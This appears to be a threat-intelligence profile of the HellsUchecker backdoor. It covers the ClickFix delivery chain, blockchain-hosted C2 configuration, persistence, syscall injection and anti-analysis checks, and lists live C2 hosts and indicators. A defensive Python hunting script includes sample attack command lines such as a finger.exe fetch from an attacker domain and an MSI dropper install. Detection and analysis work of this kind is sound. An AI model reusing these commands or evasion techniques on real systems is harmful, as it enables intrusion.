HellsUchecker
HellsUchecker is a native x64 backdoor delivered at the end of a 10-stage ClickFix-driven intrusion chain. Reporting describes it as a 28 KB memory-resident PE that is decrypted, decompressed, and manually loaded entirely in memory, never written to disk. Initial access uses a fake Cloudflare Turnstile CAPTCHA lure that tricks the victim into pasting an obfuscated command into Windows Run. That command abuses the Microsoft-signed LOLBin finger.exe over port 79 to retrieve batch commands, bootstrap a Python environment, and ultimately install an MSI dropper. The MSI deploys a BAT/MSBuild polyglot that reflectively loads a 6.5 MB .NET EtherHiding loader.
A notable feature of the delivery chain is EtherHiding-based C2 discovery: the .NET loader retrieves encrypted configuration data from a smart contract on BNB Smart Chain and Avalanche via the ERC20 name() call. The decrypted configuration includes C2 hosts such as https://more-arpc.icu and https://rpcsecnoweb.pro, enabling operators to rotate infrastructure through on-chain updates. The chain also includes extensive anti-analysis logic with 26 sandbox and environment checks, geofencing of 11 CIS countries including Russia, and decoy network-noise generation; the presence of C:\Nintendo reportedly bypasses these checks.
Persistence is established by copying the BAT polyglot to Windows-like cache paths as CacheManager.bat, setting Hidden/System attributes, timestomping files, creating CacheManager.lnk in the Startup folder, and using RegisterApplicationRestart. Injection uses Hell’s Gate-style direct syscalls, specifically NtCreateSection and NtMapViewOfSection, to execute shellcode without standard user-mode API calls. The shellcode decrypts the final payload with a SipHash-variant block cipher in CTR mode and decompresses it with aPLib.
The final HellsUchecker backdoor communicates over HTTPS POST to https://rec.allthe.site/chk using a JSON-RPC-like format and the User-Agent string "myApp v1.0". It fingerprints the host, can execute files retrieved from C2, and reports execution results back to the operator. Mentioned infrastructure and artifacts include h01-captcha.sbs, finger.cldvrfd.click, on.cldvrfd.click, vrf.cldvrfd.click, manager.msi (SHA256: 6373eec0482f5b98f127967135937fca60e5a497befb51cb1267fa402063095d), and the smart contract address 0x328A1faDff154290F0Ce1389a4E633698CDfdAa7. The campaign was reported active as of March 11, 2026.
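The delivery and C2 artifacts above (finger.exe fetch, manager.msi install, BAT/MSBuild polyglot, CacheManager.lnk in Startup, and the POST-to-/chk beacon with User-Agent "myApp v1.0") can be hunted with simple structural matches over endpoint and proxy telemetry. The following is an added example, not code from the report or from Mallory; the telemetry records and their field names are constructed for illustration, and the User-Agent is assumed to be exactly "myApp v1.0" with no trailing period. The beacon check matches on request shape rather than hostname, so it also catches a C2 host rotated through the on-chain configuration.

```python
from urllib.parse import urlparse
# Constructed sample telemetry (not from the report): proxy records plus
# process-creation and file-creation events as an EDR might export them.
PROXY_LOG = [
    {"method": "POST", "url": "https://rec.allthe.site/chk",
     "ua": "myApp v1.0", "body": '{"id":7,"arguments":[]}'},
    {"method": "POST", "url": "https://bsc-dataseed.binance.org/",
     "ua": "Mozilla/5.0", "body": '{"jsonrpc":"2.0","method":"eth_call"}'},
]
PROC_LOG = [
    {"image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger.exe x@finger.cldvrfd.click"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i manager.msi"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r'MSBuild.exe "C:\Users\u\AppData\Local\x\CacheManager.bat"'},
]
FILE_LOG = [r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu"
            r"\Programs\Startup\CacheManager.lnk", r"C:\Users\u\Desktop\a.txt"]
# Hosts named in the report; the beacon is matched on shape, so a rotated C2 still hits.
KNOWN_HOSTS = {"rec.allthe.site", "more-arpc.icu", "rpcsecnoweb.pro",
               "h01-captcha.sbs", "finger.cldvrfd.click",
               "on.cldvrfd.click", "vrf.cldvrfd.click"}

def hunt_proxy(records):
    hits = []
    for r in records:
        u = urlparse(r["url"])
        # POST to /chk with the odd User-Agent and a JSON-RPC-like body
        if (r["method"] == "POST" and u.path == "/chk"
                and r["ua"] == "myApp v1.0" and '"arguments"' in r["body"]):
            hits.append(("beacon", u.hostname))
        elif u.hostname in KNOWN_HOSTS:
            hits.append(("known_host", u.hostname))
    return hits

def hunt_process(events):
    hits = []
    for e in events:
        image, cmd = e["image"].rsplit("\\", 1)[-1].lower(), e["cmdline"].lower()
        if image == "finger.exe" and "@" in cmd:        # LOLBin fetch over port 79
            hits.append(("finger_lolbin", cmd))
        elif image == "msiexec.exe" and "manager.msi" in cmd:
            hits.append(("msi_dropper", cmd))
        elif image == "msbuild.exe" and ".bat" in cmd:  # BAT/MSBuild polyglot
            hits.append(("msbuild_bat_polyglot", cmd))
    return hits

def hunt_files(paths):  # CacheManager.lnk dropped in the Startup folder
    return [p for p in paths if p.lower().endswith(r"\startup\cachemanager.lnk")]
```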
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (5 techniques)
Persistence (2 techniques)
Privilege Escalation (3 techniques)
“It calls NtCreateSection and NtMapViewOfSection… map a read-write view for writing and a read-execute view for running the shellcode… RtlCreateUserThread targeting RX view.”
Stealth (11 techniques)
“caret escaping… base91-encoded payload… delta-encoded chunks… string encryption… XOR decrypt… SipHash-variant… aPLib compression”
“download a legitimate Python 3.14 embed package from python.org (saved with a .pdf extension to avoid download filtering)”
“Zeroes the process command line via Marshal.WriteInt16(GetCommandLineW(), 0, 0)… PEB command line is wiped after injection”
“The clipboard payload runs finger.exe… The malware uses it as a download channel… over the finger protocol on port 79.”
“writes manager.msi… and runs msiexec /i manager.msi… The MSI CustomAction runs explorer.exe "wscript_29ab.vbs"”
“BAT polyglot… searches for MSBuild.exe… passes itself to MSBuild… MSBuild’s inline C# task decodes… compiles the result in memory… Assembly.Load()”
“26 anti-analysis checks… RAM below 6 GB… process blacklist… queries 5 geolocation APIs… If 3 or more checks trigger, the process terminates.”
Discovery (1 technique)
Command and Control (4 techniques)
“6 concurrent threads that generate decoy network traffic… 70% fake blockchain RPC… 30% requests to legitimate APIs… buries the real C2 communication”
“checks in… using HTTPS POST with a JSON-RPC format: {"id":,"arguments":[]}”
IOCs tracked for this family
33 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A backdoor delivered via EtherHiding that executes files retrieved from command-and-control infrastructure and reports results back.
A 28 KB native x64 backdoor delivered through ClickFix lures and a multi-stage attack chain, using HTTPS C2, BNB Smart Chain-hosted encrypted configuration, and in-memory unpacking.
Native x64, memory-resident backdoor delivered via a multi-stage ClickFix chain. Final payload is decrypted/decompressed and manually mapped entirely in memory, then beacons over HTTPS (JSON-RPC-like POST) to a hardcoded C2 and supports download-and-execute of additional payloads.